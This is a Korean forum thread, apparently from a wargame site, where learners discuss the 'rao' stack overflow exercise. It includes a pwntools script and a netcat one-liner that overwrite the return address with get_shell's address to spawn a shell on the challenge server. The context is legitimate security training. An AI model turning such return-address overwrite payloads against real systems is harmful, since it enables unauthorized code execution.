from pwn import * #x86-64 context.arch = 'amd64' context.log_level = 'debug' #dummy code to take the shell #0x30 for buffer, 0x8 for STB, else for the address of 'get_shell()' d = b'A' * 0x30 + b'B' * 0x8 + b'\xdd\x11\x40\x00\x00\x00\x00\x00' #access the server #ip and port can be changed #p = process('./rao') p = remote('host1.dreamhack.games', 10693) #receive until 'Input: ' p.recvuntil('Input: ') #send dummy code to server p.send(d) #take the shell p.interactive() 위와 같이 짰는데요. 실행해보면 쉘은 뜨는데 Got EOF while reading in interactive 이거 나오고 아무 반응도 없습니다. 혹시나 해서 서버 말고 로컬로 바꾼 후 실행해보면 잘만 되고요. 강의에서 파이썬으로 인자를 주는 방식으로 입력하는 것도 로컬에서는 잘 되는데 서버에다 하면 또 안 됩니다. 서버에 보낼 때는 뭔가 추가로 해줘야하는건가요?

풀긴 했는데 이해가 안 됩니다.. 원래 같은 건가요? 메모리 주소는 당연히 컴퓨터마다 다르다고 생각했는데...너무 궁금합니다 도움 말씀 부탁드립니다

문제는 풀었지만 char buf의값는 28인데 buf 30 이들어가는 이유가 궁금합니다

C코드에는 buf 크기가 0x28로 기억되어있는데, GDB로 바이너리 실행파일을 분석해보니 buf크기가 0x30으로 되어있는거 같습니다 혹시 C언어 코드에 오타가 났다고 이해해도될까요?

이거 플래그 어케얻죠? 로컬에서 쉘 실행까지는 했는데 플래그를 찾아야하는데 흠..

void init() { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); } 이 친구가 가지는 의미가 뭔가요..?

flag보는법.PNG 위와 같은 결과가 나왔는데 혹시 이게 쉘을 따낸건가요?? 여기서 flag파일을 보려면 어떻게해야하나요?

gdb에서 get_shell의 주소가 4011dd인걸 확인하고 buffer 48바이트 sfp 8바이트 그리고 4011dd를 전달해줬는데 switching to interactive mode뜨고 ls를 입력해줬더니 got eof whilte reading in interactive이 뜨고 종료됩니다... 로컬에서는 되는데 remote로 하면 안되네요 무엇이 문제일까요..?

(python3 -c "print(b'A'0x30+b'B'0x8 + b'\xdd\x11\x40\x00\x00\x00\x00\x00')"; cat) | nc host1.dreamhack.games 16914 이렇게 입력하였더니 아무런 응답이 없습니다. Input : 이 출력될 때 입력값을 추가로 줘야되나요?

강의내용을 따라 페이로드를 작성하고 강의 내용에 나와있는 방식으로 페이로드를 전달하려고 하는데 아래 사진과 같이 buffer가 없다는 에러가 뜨네요 어떻게해야할까요?? rao.PNG